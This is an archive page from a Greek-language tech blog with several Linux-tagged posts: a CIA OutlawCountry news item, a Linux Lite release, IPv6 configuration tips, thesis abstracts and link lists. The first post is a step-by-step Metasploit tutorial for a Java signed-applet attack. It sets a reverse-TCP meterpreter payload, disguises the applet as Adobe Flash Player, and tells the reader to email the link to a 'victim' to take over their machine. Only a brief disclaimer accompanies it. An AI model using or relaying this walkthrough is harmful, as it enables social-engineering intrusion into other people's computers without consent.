Kατεβάσετε την εφαρμογή android του blog! DownLoad

FoulsCode: 2011-17

Translate

Πρόσφατα Σχόλια

Σύνολο αναρτήσεων

Εμφάνιση αναρτήσεων με ετικέτα Linux. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα Linux. Εμφάνιση όλων των αναρτήσεων

Java Signed Applet Social Engineering Code Execution - Backtrack 5 R3

Written By Greek Port on Σάββατο, 8 Ιουλίου 2017 | Ιουλίου 08, 2017

Στο tutorial που ακολουθεί θα προσπαθήσω να σας δείξω πως χρησιμοποιούμε τα Social Engineering Tools για να χτυπήσουμε ένα θύμα. Η διαδικασία είναι απλή και όλο το νόημα αυτής βασίζεται στην αποστολή URL στο θύμα μας έτσι ώστε όταν ανοίξει το URL που θα του στείλουμε να εκτεθεί το σύστημα του.

Requirement :

1. Metasploit Framework

2. Operating System(Προτείνω Linux OS ή Backtrack 5)

Βήμα προς Βήμα:

Α) Πρώτα απ' όλα ανοίγουμε ένα τερματικό πληκτρολογούμε:

Terminal: msfconsole <-|


Στη συνέχεια περιμένουμε λίγο και μας εμφανίζει msf> και πληκτρολογούμε:


use exploit/multi/browser/java_signed_applet <-|(φορτίζουμε το java_signed_applet exploit)

set payload windows/meterpreter/reverse_tcp <-|(ορίζουμε το reverse_tcp meterpreter έτσι ώστε να συνδεθούμε με το θύμα)


Β) Το επόμενο βήμα είναι να πληκτρολογήσουμε κάποιες εντολές...


Terminal: set appletname Adobe_Inc <-|
set certcn Adobe Flash Player <-|

set srvhost 192.168.8.92 <-| (η διεύθυνση τουδιακομιστή που ορίζει το exploit δηλαδή η διευθυνσή μας)

set srvport 80 <-| (επιλέγουμε τη θύρα 80 διότι είναι η κατάλληλη για τέτοιου είδους επιθέσεις μέσω social engineering tools)

set uripath videoplaylist <-| (η URL που στέλνουμε στο θύμα μας έτσι ώστε όταν την ανοίξει να εκτεθεί --> http://192.168.8.92/videoplaylist)

set lhost 192.168.8.92 <-| (η διεύθυνση μας)

set lport 443 <-| (η θύρα που χρησιμοποιούμε για να συνδεθούμε με το θύμα μας)

exploit <-| (έναρξη έκθεσης...)


Στη συνέχεια με κάποιο τρόπο πρέπει να αποστείλουμε στο θύμα μας τη διεύθυνση http://192.168.8.92/videoplaylist έτσι ώστε όταν την ανοίξει να αποκτήσουμε πρόσβαση στο σύστημά του. Μπορούμε να την αποστείλουμε με e-mail κτλ.

Όταν λοιπόν την ανοίξει αμέσως στο τερματικό μας τρέχει το σύστημα και μας λέει ότι το meterpreter session 1 opened... και έχει ανοίξει το σύστημα του και μας εμφανίζεται η καρτέλα:


Terminal: session -l <-| (για να δω τα ενεργά session)

Μετά μας βγάζει ότι έχουμε ένα session στη λίστα μας και πληκτρολογώ ξανά..

session -i <-|


Τέλος μας εμφανίζει στην οθόνη meterpreter>που σημαίνει ότι έχουμε μπει πλέον στο σύστημα του.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεταιποινικά από το νόμο.

via: securitydnainfo.blogspot.gr


Ιουλίου 08, 2017 | 0 σχόλια | Διαβάστε περισσότερα

OutlawCountry hacking εργαλείο της CIA για συσκευές με Linux

Written By Greek Port on Τρίτη, 4 Ιουλίου 2017 | Ιουλίου 04, 2017



OutlawCountry : Μετά από το εργαλείο ELSA, το οποίο σύμφωνα με το WikiLeaks είναι ένα malware των Windows που χρησιμοποιεί η CIA για τον προσδιορισμό της θέσης ενός συγκεκριμένου χρήστη, έρχεται η αποκάλυψη του OutlawCountry, ένα διαφορετικό εργαλείο hacking που χρησιμοποιεί η υπηρεσία, σε συσκευές Linux.

Ένα εγχειρίδιο χρήσης που διέρρευσε το WikiLeaks αποκαλύπτει ότι η CIA χρησιμοποιεί το OutlawCountry τουλάχιστον από τον Ιούνιο του 2015. Το εργαλείο είναι ειδικά σχεδιασμένο για να ανακατευθύνει την εξερχόμενη κίνηση στο Internet σε άλλες διευθύνσεις.



Αυτό ουσιαστικά σημαίνει ότι οι πράκτορες της CIA μπορούν να παρακολουθήσουν τη δραστηριότητα ενός διακομιστή Linux. Για να είναι όμως αποτελεσματικό το OutlawCountry, η μυστική υπηρεσία πληροφοριών θα πρέπει πρώτα να αποκτήσει προνόμια πρόσβασης root.

Με άλλα λόγια, η CIA θα πρέπει πρώτα να παραβιάσει ένα σύστημα Linux με κάποια διαφορετική μέθοδο πριν μπορέσει να λειτουργήσει το OutlawCountry.
OutlawCountry

Το WikiLeaks αναφέρει ότι η πρώτη έκδοση του OutlawCountry περιέχει ένα kernel module για το CentOS/RHEL 6.x στα 64 bit και μπορεί να λειτουργεί μόνο με προεπιλεγμένους πυρήνες (kernels), ενώ υποστηρίζει μόνο την προσθήκη συγκεκαλυμμένων κανόνων DNAT στο PREROUTING chain.

“Το κακόβουλο λογισμικό αποτελείται από ένα kernel module που δημιουργεί έναν κρυφό πίνακα netfilter σε ένα στόχο Linux. Γνωρίζοντας το όνομα του πίνακα, ο επιτιθέμενος μπορεί να δημιουργήσει κανόνες που υπερισχύουν των υφιστάμενων κανόνων netfilter/iptables και είναι κρυφοί από έναν χρήστη ή ακόμα και από τον διαχειριστή συστήματος”, αναφέρει το WikiLeaks.

Το εγχειρίδιο χρήσης εξηγεί επακριβώς τον τρόπο λειτουργίας του hacking εργαλείου, ενώ αποκαλύπτει ότι η CIA μπορεί να αφαιρέσει όλα τα ίχνη του κακόβουλου λογισμικού μόλις ολοκληρωθεί η επίθεση.


“Το εργαλείο OutlawCountry φέρει ένα λειτουργικό kernel module για το Linux 2.6. Ο επιτιθέμενος φορτώνει το module με shell στο στόχο. Όταν φορτωθεί, το module δημιουργεί ένα νέο πίνακα netfilter. Ο νέος πίνακας επιτρέπει τη δημιουργία ορισμένων κανόνων χρησιμοποιώντας την εντολή iptables. Αυτοί οι κανόνες υπερισχύουν των υφιστάμενων κανόνων και είναι ορατοί μόνο σε ένα διαχειριστή που γνωρίζει το όνομα του πίνακα. Όταν ο επιτιθέμενος αφαιρέσει το kernel module, ο νέος πίνακας αφαιρείται επίσης.”

Ακριβώς όπως στα Windows, συνιστάται στους χρήστες του λειργικού Linux να ενημερώνουν τα συστήματα τους άμεσα στις πιο πρόσφατες εκδόσεις και να αναπτύσσουν όλα τα διαθέσιμα patches που κυκλοφορούν στα επίσημα αποθετήρια τις κάθε διανομής.
WikiLeaks Vault 7



Να υπενθυμίσουμε ότι το Wikileaks κυκλοφορεί έγγραφα στη σειρά Vault 7 από τις 7 Μαρτίου, εκθέτοντας όλο και περισσότερα εργαλεία των hackers της CIΑ.

“Year Zero” η CIA εκμεταλλεύεται δημοφιλή hardware και λογισμικό.
“Weeping Angel” το εργαλείο κατασκοπείας που χρησιμοποιεί η υπηρεσία για να διεισδύσει σε έξυπνες τηλεοράσεις, μετατρέποντάς τες σε συγκεκαλυμμένα μικρόφωνα.
“Dark Matter” exploits που στοχεύουν iPhones και Mac.
“Marble” ο πηγαίος κώδικας ενός μυστικού anti-forensic framework. Ουσιαστικά είναι ένα obfuscator που χρησιμοποιεί η CIA για να κρύψει την πραγματική πηγή κακόβουλου λογισμικού.
“Grasshopper” ένα framework το οποίο επιτρέπει στην υπηρεσία πληροφοριών να δημιουργήσει εύκολα προσαρμοσμένο κακόβουλο λογισμικό για να παραβιάζει Windows της Microsoft και να παρακάμψει κάθε προστασία από ιούς.



“Archimedes”– ένα εργαλείο επίθεσης MitM που φέρεται ότι δημιούργησε η CIA για τη στοχοθέτηση υπολογιστών μέσα σε ένα τοπικό δίκτυο (LAN).

"Scribbles" ένα software που είναι σχεδιασμένο να προσθέτει ‘web beacons’ σε απόρρητα έγγραφα, για να επιτρέπει τον έλεγχο των διαρροών από τις μυστικές υπηρεσίες.

"Athena": έχει σχεδιαστεί για να μπορεί να αποκτήσει απόλυτα τον πλήρη έλεγχο των μολυσμένων υπολογιστών Windows, επιτρέποντας στην CIA να εκτελεί πάρα πολλές λειτουργίες στο μηχάνημα-στόχο, όπως διαγραφή δεδομένων ή εγκατάσταση κακόβουλου λογισμικού, κλοπής δεδομένων και αποστολής τους σε servers της CIA.

"CherryBlossom" εργαλείο που παρακολουθεί τη δραστηριότητα στο διαδίκτυο ενός στόχου, να ανακατευθύνει το πρόγραμμα περιήγησης, να ανιχνεύει διευθύνσεις ηλεκτρονικού ταχυδρομείου και αριθμούς τηλεφώνου και πολλά άλλα, μέσω του router.
"Brutal Kangaroo" εργαλείο που μπορεί να χρησιμοποιηθεί για να μολύνει air-gapped υπολογιστές με κακόβουλο λογισμικό.

"ELSA" malware των Windows που χρησιμοποιεί η CIA για τον προσδιορισμό της θέσης ενός συγκεκριμένου χρήστη χρησιμοποιώντας το Wi-Fi του υπολογιστή του.







Πηγή: secnews
Ιουλίου 04, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Linux Lite φιλικό για αρχάριους και χρήστες των Windows

Written By Greek Port on Κυριακή, 21 Μαΐου 2017 | Μαΐου 21, 2017



Το Linux Lite 3.0 προσφέρει μεγάλη ευελιξία και χρηστικότητα τόσο για τους πρόσφατους “μετανάστες” από τα Windows της Microsoft όσο και για τους έμπειρους χρήστες του Linux.

Το Linux Lite είναι μια φιλική διανομή για κάθε αρχάριο και βασίζεται στην διανομή μακρόχρονης υποστήριξης του Ubuntu (LTS). Έρχεται με επιφάνεια εργασίας την Xfce. Το Linux Lite όπως προαναφέραμε απευθύνεται κυρίως στους χρήστες των Windows. Στόχος του είναι να παρέχει ένα πλήρες σύνολο εφαρμογών που θα βοηθήσουν τους χρήστες στις καθημερινές τους ανάγκες.



Όλα τα στοιχεία ελέγχου και ρυθμίσεων του συστήματος βρίσκονται στην επιλογή Ρυθμίσεις στην οθόνη του κύριου μενού, όπως μπορείτε να δείτε και στην παραπάνω εικόνα. Οι χρήστες των Windows θα βρουν μια πολύ στενή ομοιότητα με τον Πίνακα Ελέγχου σε αυτό το λειτουργικό σύστημα. Ακόμη και οι νεοεισερχόμενοι νέοι χρήστες του Linux δεν θα χρειαστούν πολλή εξερεύνηση για να περιηγηθούν στο Linux Lite.

Αυτή τη στιγμή, κυκλοφορεί το Linux Lite 3.4 Final.

Το νέο Linux Lite συνεχίζει να επικεντρώνεται στην Ασφάλεια παρέχοντας μια νεότερη εφαρμογή Lite Updates.

Αυτή η εφαρμογή σας στέλνει ειδοποιήσεις στην επιφάνεια εργασίας που σας ενημερώνουν για όλες τις διαθέσιμες ενημερώσεις.


Συνεχίζοντας με τα χαρακτηριστικά ασφαλείας αξίζει να αναφέρουμε το Lite Welcome που διαθέτει μια νέα εμφάνιση Θα βοηθήσει τον κάθε νεοεισερχόμενο στο λειτουργικό, να εγκαταστήσει εύκολα τις ενημερώσεις, τα απαραίτητα προγράμματα οδήγησης και να ρυθμίσει ένα σημείο επαναφοράς.

Αυτή η έκδοση φέρνει επίσης 4 νέα χαρακτηριστικά στο Lite Tweaks: Hibernate & Suspend, επιλογές σύνδεσης και αποσύνδεσης, Διαχείριση και αποθήκευση Sessions και το zRam.

Με την επιλογή Hibernate & Suspend, μπορείτε να επιλέξετε αν θα εμφανίζονται ή όχι αυτές οι επιλογές στην οθόνη Αποσύνδεσης.

Η δυνατότητα “Σύνδεση και αποσύνδεση” επιτρέπει στον διαχειριστή να ενεργοποιήσει ή να απενεργοποιήσει τις επιλογές παραθύρου σύνδεσης και αποσύνδεσης.

Αυτές οι 2 νέες λειτουργίες είναι ιδιαίτερα χρήσιμες για ρυθμίσεις πολλαπλών χρηστών. Το zRam είναι μια συμπιεσμένη μορφή RAM για ταχύτερη είσοδο/έξοδο και είναι ιδανική για τους παλαιότερους υπολογιστές.

Αν σας ενδιαφέρουν όλα τα παραπάνω μπορείτε να κατεβάσετε τα ISO από τα παρακάτω links:
Linux Lite 3.4 32bit – 1st April, 2017

FILENAME: linux-lite-3.4-32bit.iso

SIZE: 998MB – DVD

MD5SUM: 4cca4626a72c8fe706724c7dbe2b2ca6

HTTP MIRRORS: Click here

TORRENT HASH: 733d2c4108f786f4a3dec66c1f0d2625f045c21d

LIVE USER: Login to the live desktop is automatic

BASE: Ubuntu 16.04.2 LTS
DOWNLOAD 32bit


TORRENT 32bit
Linux Lite 3.4 64bit – 1st April, 2017

FILENAME: linux-lite-3.4-64bit.iso

SIZE: 986MB – DVD

MD5SUM: b38eb27635bbbeb8473cf43713b2593e

HTTP MIRRORS: Click here

TORRENT HASH: a683e4157c3f6f2adab5a15b23bb1f4425c91d84

LIVE USER: Login to the live desktop is automatic

BASE: Ubuntu 16.04.2 LTS
DOWNLOAD 64bit

TORRENT 64bit

via: secnews.gr
Μαΐου 21, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Μερικά Top Network Security Tools (1)

Written By Greek Port on Δευτέρα, 31 Οκτωβρίου 2016 | Οκτωβρίου 31, 2016

*Κάντε κλικ στο παρακάτω link και περιμένετε 5 δευτερόλεπτα
*Με αυτό μας βοηθάτε το FoulsCode.com να μην σταματάμε να βρίσκουμε καινούρια πράγματα συνεχεια και να τα μοιραζόμαστε στο blog ;)

>Network Security Tools....


Για την αντιμετώπιση κάποιον προβλημάτων στον blogger.com τα θέματα και τα αρχεία θα φιλοξενούνται σε άλλο server της εταιρίας xtgem.com

Οκτωβρίου 31, 2016 | 0 σχόλια | Διαβάστε περισσότερα

Linux Focus Links

Written By Greek Port on Τρίτη, 5 Ιουλίου 2016 | Ιουλίου 05, 2016

LinuxFocus Links




NederlandstaligEngelstaligBeschrijving
Algemeen
nl.linux.orgDé informatiebron voor Linux in het Nederlandse taalgebied.
www.linux.beEen soort nl.linux.org door Belgen.
www.linux.orgInformatie over Linux in het algemeen en de projecten errond in het bijzonder.
www.linux.comEen mooie site met veel informatie, gesteund door de grote namen uit de Linux gemeenschap.
www.kernel.orgDE startplaats als je een verse kernel zoekt. Gebruik de mirrors!
localhost.beGewoon een .be homepage.
www.mrlinux.bizEen uitgebreide community-site.
Verenigingen
www.nllgg.nlNederlandse Linux Gebruikersgroep.
lgga.arendsen.cx/index.phpLinux GG Achterhoek
Portaalsites
www.linuxportal.comDe naam zegt het al.
www.linuxstart.comDeze kan je raden...
www.linuxlinks.comEn deze ook...
opensource.pagina.nlOpenSource pagina
www.leren.nlLeer over alles, ook over Linux/OpenSource
www.linuxonly.nlBehoorlijk uitgebreide nl-talige Linux portal
Magazines
www.linuxfocus.org/Nederlands/www.linuxfocus.orgDat zijn wij dus.
www.linuxdoos.comNederlandstalig magazine over toepassingen op Linux.
www.linuxworld.comZeer goede Linux artikels.
www.linuxpower.comOok een site met Linux-artikels.
www.osopinion.comEen site die handelt over alle belangrijke besturingssystemen.
www.linuxjournal.comHet meest gerespecteerde Linux-magazine in druk.
Nieuws
linuxdot.nl.linux.orgNederlandstalige nieuwssite voor geïnteresseerden in Linux en OpenSource
www.lwn.orgLinux Weekly News.
www.linuxdaily.comConstant vers Linux nieuws.
www.slashdot.orgDE bron van de laatste hi-tech nieuwtjes en roddels.
Applicaties
www.freshmeat.netHier vind je het wel. Zeker weten.
www.linuxberg.comDe Tucows van Linux programma's.
www.linuxapps.comZoals Freshmeat en Linuxberg hierboven.
www.xfree86.orgDe X Free 86 display manager.
www.kde.nlwww.kde.orgDe KDE desktop omgeving.
www.gnome.orgDe GNOME desktop omgeving.
www.apache.orgDe Apache web server.
Distributies
www.debian.orgDebian. Gratis en open.
linux.corel.comCorel, gebaseerd op Debian en KDE.
www.slackware.comSlackware
www.suse.comSuSe
www.redhat.comRedHat
www.mandrake.comMandrake

Ιουλίου 05, 2016 | 0 σχόλια | Διαβάστε περισσότερα

Disable IPv6 on Linux

Written By Greek Port on Δευτέρα, 15 Φεβρουαρίου 2016 | Φεβρουαρίου 15, 2016





Followed the common advice from the Internet to disable IPv6 by adding the following to /etc/sysctl.conf:


# disable IPv6 net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1




However, according to ip addr show, there were still 9 inet6 addresses for interfaces like eth0 and wlan0:


ip addr show | grep -c inet6 9







Indeed, according to sysctl output, while net.ipv6.conf.all.disable_ipv6 and net.ipv6.conf.default.disable_ipv6 are set, interfaces not explicitly mentioned still don't have IPv6 disabled:


sudo sysctl -a | grep disable_ipv6




net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.eth0.disable_ipv6 = 0 net.ipv6.conf.lo.disable_ipv6 = 1 net.ipv6.conf.wlan0.disable_ipv6 = 0




Used the following to add disable ipv6 directives for all the interfaces on the system (sudo -s first):


sysctl -a | grep disable_ipv6 | sed 's/0$/1/' | tee -a /etc/sysctl.conf




Enable:


sysctl -p





After this, ip addr show no longer showed any inet6 addresses:


ip addr show | grep -c inet6 0

Φεβρουαρίου 15, 2016 | 0 σχόλια | Διαβάστε περισσότερα

Αναλυτής αρχείων καταγραφής για τείχη ηλεκτρονικής προστασίας στο λειτουργικό σύστημα Linux

Written By Greek Port on Τρίτη, 20 Ιανουαρίου 2015 | Ιανουαρίου 20, 2015



 
Περίληψη



Ένας αναλυτής αρχείων καταγραφής (log analyzer) έχει ως λειτουργίες να παρακολουθεί την κυκλοφορία στο δίκτυο, τις επισκέψεις σε ιστοσελίδες, αλλά και την ποσότητα της πληροφορίας που προσπελάζεται. Με βάση τα δεδομένα που συλλέγει παρέχει πληροφορίες για την αποτελεσματική διαχείριση του εύρους ζώνης του δικτύου, την ανακάλυψη διαφόρων ειδών επιθέσεων και υιών, όπως και άλλα στοιχεία που μπορεί να είναι χρήσιμα σε έναν οργανισμό. Ο αναλυτής που παρουσιάζεται σε αυτή την διπλωματική εργασία είναι υπεύθυνος για τη συλλογή, ανάλυση και εξαγωγή πληροφορίας για κάποιο πληρεξούσιο εξυπηρετητή (proxy server), ή για ένα τείχος ηλεκτρονικής προστασίας (firewall) ή γενικότερα για κάποιο εξυπηρετητή. Η εφαρμογή τρέχει μέσω ενός τερματικού σε πλατφόρμες που είναι βασισμένες στο λειτουργικό σύστημα Linux. 


Η παρούσα εργασία χωρίζεται σε πέντε ενότητες. Στην πρώτη ενότητα γίνεται μία εισαγωγή στον τρόπο ανάπτυξης ενός αναλυτή αρχείων καταγραφής αλλά και στη μεθοδολογία που ακολουθήθηκε για την ανάπτυξη του συγκεκριμένου αναλυτή. Στη δεύτερη ενότητα, γίνεται μία σύντομη παρουσίαση των τειχών ηλεκτρονικής προστασίας Διαδικτύου (Internet firewalls) και περιγράφεται ο τρόπος λειτουργίας τους. Επίσης, περιγράφεται η αρχιτεκτονική του δικτύου που χρησιμοποιήθηκε για τους σκοπούς αυτής της εργασίας. Πάνω σε αυτή την αρχιτεκτονική στηρίχτηκε τόσο η ανάπτυξη, όσο και η μορφοποίηση του τείχους ηλεκτρονικής προστασίας και του πληρεξούσιου εξυπηρετητή. Τέλος, γίνεται μία αναφορά στη σημασία και σπουδαιότητα μίας πολιτικής ασφαλείας (security policy) για έναν οργανισμό.
Η τρίτη ενότητα ασχολείται κυρίως με θέματα πληρεξούσιων συστημάτων (proxy systems). Συγκεκριμένα, γίνεται μία ανάλυση των πλεονεκτημάτων και των μειονεκτημάτων του πληρεξούσιου εξυπηρετητή, περιγράφεται ο τρόπος λειτουργίας του

πληρεξούσιου πελάτη και εξυπηρετητή, και παρουσιάζονται οι διάφοροι τύποι των πληρεξούσιων εξυπηρετητών.
Στην τέταρτη ενότητα παρουσιάζεται ο πληρεξούσιος εξυπηρετητής που χρησιμοποιήθηκε στην παρούσα εργασία, ο οποίος είναι ο squid. Ο σκοπός αυτής της ενότητας είναι να καθοδηγήσει τον αναγνώστη σε θέματα εγκατάστασης, μορφοποίησης, και εκκίνησης του squid στο λειτουργικό σύστημα Linux. Ιδιαίτερη έμφαση δίνεται στο αρχείο καταγραφής του squid, που αποτελεί και τη βασική πηγή συγκέντρωσης της πληροφορίας για την ανάπτυξη του αναλυτή αρχείου καταγραφής του πληρεξούσιου εξυπηρετητή


Στην πέμπτη ενότητα παρουσιάζεται αναλυτικά η διαδικασία ανάπτυξης του αναλυτή αρχείου καταγραφής πληρεξούσιου εξυπηρετητή. Γίνεται μία ανάλυση του αλγορίθμου που αναπτύχθηκε τόσο σε θεωρητικό όσο και σε πρακτικό επίπεδο και παρουσιάζεται η ανάπτυξη της εφαρμογής σε μορφή ψευδοκώδικα. Η έκτη και τελευταία ενότητα περιγράφει τον μηχανισμό φιλτραρίσματος πακέτων (packet filtering mechanism) που ελέγχει την ροή των δεδομένων από και προς το δίκτυό μας. Στην ενότητα αυτή αναλύεται διεξοδικά το εργαλείο iptables καθώς και το αρχείο καταγραφής του τείχους ηλεκτρονικής προστασίας το οποίο αποτελεί τη βασική πηγή πληροφόρησης για την ανάπτυξη του αναλυτή αρχείου καταγραφής του τείχους ηλεκτρονικής προστασίας. Επίσης, παρουσιάζεται αναλυτικά η διαδικασία ανάπτυξης του δεύτερου αναλυτή, η οποία είναι παρόμοια με αυτή που ακολουθήθηκε και στην ανάπτυξη του πληρεξούσιου εξυπηρετητή.
Από την ανάπτυξη του αναλυτή καταγραφής αρχείου για τον πληρεξούσιο εξυπηρετητή αλλά και για το τείχος ηλεκτρονικής προστασίας προκύπτει ότι με μικρές τροποποιήσεις είναι εύκολη η ανάπτυξη οποιουδήποτε άλλου αναλυτή αρχείου καταγραφής, όπως για παράδειγμα ενός αρχείου καταγραφής ηλεκτρονικού ταχυδρομείου. Ο αλγόριθμος που αναπτύχθηκε είναι αρκετά γενικός, ώστε να καθίσταται δυνατή η γρήγορη προσαρμογή του σε οποιοδήποτε αρχείο καταγραφής. Αξίζει να σημειωθεί, ότι σύμφωνα με μία
 έρευνα που έκανα στο Διαδίκτυο, δεν υπάρχει κάποιος αναλυτής καταγραφής αρχείου σε μορφή ανοιχτού κώδικα (open source) που να παρέχει τη λειτουργία που μας ενδιαφέρει σε τόσο συγκεντρωτική μορφή. Υπάρχουν μόνο μερικά εμπορικά προϊόντα, όπου η ανάλυση των αρχείων καταγραφής αποτελεί τμήμα ενός υπερκείμενου ολοκληρωμένου συστήματος ασφαλείας


DOWNLOAD 
Ιανουαρίου 20, 2015 | 0 σχόλια | Διαβάστε περισσότερα

Μελέτη του λειτουργικού συστήματος Linux στη πραγματοποίηση αναχωμάτων ασφαλείας

Written By Greek Port on Παρασκευή, 2 Ιανουαρίου 2015 | Ιανουαρίου 02, 2015



Συγγραφείς: Λαγός, Μιχαήλ
Θέματα: Διατριβές
Computer networks-Security measures
Computer security
Electric network analyzers
Ημ. Εισαγωγής : 21-Αύγ-2007
Περίληψη: Ένας αναλυτής αρχείων καταγραφής (log analyzer) έχει ως λειτουργίες να παρακολουθεί την κυκλοφορία στο δίκτυο, τις επισκέψεις σε ιστοσελίδες, αλλά και την ποσότητα της πληροφορίας που προσπελάζεται. Με βάση τα δεδομένα που συλλέγει παρέχει πληροφορίες για την αποτελεσματική διαχείριση του εύρους ζώνης του δικτύου, την ανακάλυψη διαφόρων ειδών επιθέσεων και υιών, όπως και άλλα στοιχεία που μπορεί να είναι χρήσιμα σε έναν οργανισμό. Ο αναλυτής που παρουσιάζεται σε αυτή την διπλωματική εργασία είναι υπεύθυνος για τη συλλογή, ανάλυση και εξαγωγή πληροφορίας για κάποιο πληρεξούσιο εξυπηρετητή (proxy server), ή για ένα τείχος ηλεκτρονικής προστασίας (firewall) ή γενικότερα για κάποιο εξυπηρετητή. Η εφαρμογή τρέχει μέσω ενός τερματικού σε πλατφόρμες που είναι βασισμένες στο λειτουργικό σύστημα Linux.
Ταξινομικός Αρ : 005.8 ΛΑΓ
Εμφανίζεται στις συλλογές:Τμήμα Ψηφιακών Συστημάτων
DOWNLOAD
Ιανουαρίου 02, 2015 | 0 σχόλια | Διαβάστε περισσότερα

Δωρεάν e-book για εκμάθηση της γραμμής εντολών του Linux!ux

Written By Greek Port on Τετάρτη, 11 Δεκεμβρίου 2013 | Δεκεμβρίου 11, 2013


To e-book "The Linux Command Line" αναβαθμίστηκε, έβγαλε δεύτερη έκδοση και είναι διαθέσιμο για δωρεάν λήψη από όποιον έχει περιέργεια να μάθει τα μυστικά του κελύφους του Linux (linux shell).


Πρόκειται για έναν πραγματικό τόμο 537 σελίδων γραμμένο από τον William Shotts, που απευθύνεται στον νέο χρήστη του Linux που θέλει να μάθει να μαστορεύει πράγματα από τη γραμμή εντολών, αλλά προχωράει και σε προχωρημένα πράγματα για δημιουργία αυτοματοποιημένων σενάριων κελύφους.
Στα κεφάλαια του αναλύονται βασικές, γνωστές και άγνωστες εντολές του Linux.

>>> Το e-book είναι διαθέσιμο δωρεάν (άδεια Creative Commons) σε μορφή PDF από εδώ


ΠΗΓΗ
Δεκεμβρίου 11, 2013 | 0 σχόλια | Διαβάστε περισσότερα
 
berita unik